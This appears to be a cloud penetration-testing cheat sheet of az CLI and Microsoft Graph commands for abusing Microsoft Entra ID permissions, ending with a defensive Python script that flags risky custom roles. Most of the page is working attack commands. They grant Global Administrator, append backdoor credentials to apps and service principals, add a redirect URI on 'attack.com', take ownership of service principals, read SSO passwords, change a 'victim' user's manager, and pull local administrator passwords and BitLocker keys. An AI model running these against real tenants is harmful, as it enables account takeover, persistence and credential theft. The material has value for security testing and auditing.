```bash
# List enabled built-in roles
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
  --headers "Content-Type=application/json" \
  --body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```
Add more permissions to a role:
```bash
# List only custom roles
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" \
  | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
  --headers "Content-Type=application/json" \
  --body '{"description": "Update basic properties of application registrations","rolePermissions": [{"allowedResourceActions": ["microsoft.directory/applications/credentials/update"]}]}'
```
```bash
# Generate a new password without overwriting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwriting old ones
# (--append is required here too, otherwise existing credentials are replaced)
az ad app credential reset --id <appId> --create-cert --append
```
```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
# --web-redirect-uris takes space-separated values: pass each URI as its own argument
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback" "https://attack.com/callback"
```
```bash
# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
  --headers "Content-Type=application/json" \
  --body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>
```
```bash
# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
  --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
  --headers "Content-Type=application/json" \
  --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"

# Get credentials of a specific credID
# (the URI path takes the service principal id; the credential id goes in the body)
credID="<credID>"
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spID/getPasswordSingleSignOnCredentials" \
  --headers "Content-Type=application/json" \
  --body "{\"id\": \"$credID\"}"
```
```bash
# e.g. change manager of a user
# (PUT on the victim's manager reference, pointing it at the new manager;
#  the body is double-quoted so $managerUser expands)
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
  --uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref" \
  --headers "Content-Type=application/json" \
  --body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"

# e.g. change department of a user
az rest --method PATCH \
  --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
  --headers "Content-Type=application/json" \
  --body "{\"department\": \"security\"}"
```
This permission allows an attacker to read the properties of the backed-up local administrator account credentials of Microsoft Entra joined devices, including the password.
```bash
# List deviceLocalCredentials
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials (the variable name must match the one used in the URI)
deviceLCID="<deviceLCID>"
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials"
```
BitlockerKeys
microsoft.directory/bitlockerKeys/key/read
This permission grants access to BitLocker keys, which could let an attacker decrypt drives and so compromise data confidentiality.
```bash
# List recovery keys
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```
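From the defender's side, the `roleDefinitions` listing used above is also the place to audit: a custom role that has been given `applications/credentials/update`, `deviceLocalCredentials/password/read` or `bitlockerKeys/key/read` is exactly the kind of grant the sections above abuse. The script below is an added example (not from the original page or from any tool it describes) that parses a response in the shape of `GET /roleManagement/directory/roleDefinitions` and flags custom roles granting those actions, including via wildcard grants; the sample response and its ids are constructed for the example.

```python
import fnmatch
import json

# Resource actions from this page that warrant review when a custom
# (non built-in) role grants them.
SENSITIVE_ACTIONS = [
    "microsoft.directory/applications/credentials/update",
    "microsoft.directory/servicePrincipals/credentials/update",
    "microsoft.directory/deviceLocalCredentials/password/read",
    "microsoft.directory/bitlockerKeys/key/read",
]

# Constructed sample in the shape of GET /roleManagement/directory/roleDefinitions
# (ids and names are placeholders, not real tenant data).
SAMPLE_RESPONSE = json.dumps({"value": [
    {"id": "role-0001", "displayName": "Global Administrator", "isBuiltIn": True,
     "rolePermissions": [{"allowedResourceActions":
         ["microsoft.directory/*/allProperties/allTasks"]}]},
    {"id": "role-0002", "displayName": "App Reg Helper", "isBuiltIn": False,
     "rolePermissions": [{"allowedResourceActions":
         ["microsoft.directory/applications/basic/update",
          "microsoft.directory/applications/credentials/update"]}]},
    {"id": "role-0003", "displayName": "Device Ops", "isBuiltIn": False,
     "rolePermissions": [{"allowedResourceActions":
         ["microsoft.directory/deviceLocalCredentials/*"]}]},
    {"id": "role-0004", "displayName": "Readers", "isBuiltIn": False,
     "rolePermissions": [{"allowedResourceActions":
         ["microsoft.directory/users/basic/read"]}]},
]})


def find_risky_custom_roles(response_json: str) -> dict:
    """Map each custom role's displayName to the sensitive actions it grants.
    Wildcard grants (e.g. '.../deviceLocalCredentials/*') are matched with
    fnmatch so a broad permission is caught, not only an exact string."""
    findings = {}
    for role in json.loads(response_json).get("value", []):
        if role.get("isBuiltIn"):
            continue  # built-in roles are reviewed separately
        granted = [a for p in role.get("rolePermissions", [])
                   for a in p.get("allowedResourceActions", [])]
        hits = sorted({s for s in SENSITIVE_ACTIONS
                       for g in granted if fnmatch.fnmatchcase(s, g)})
        if hits:
            findings[role["displayName"]] = hits
    return findings
```

Feed it the raw output of the `az rest` call against `roleDefinitions`; any role it returns should be cross-checked against the role's assignments and the audit log entry that created it.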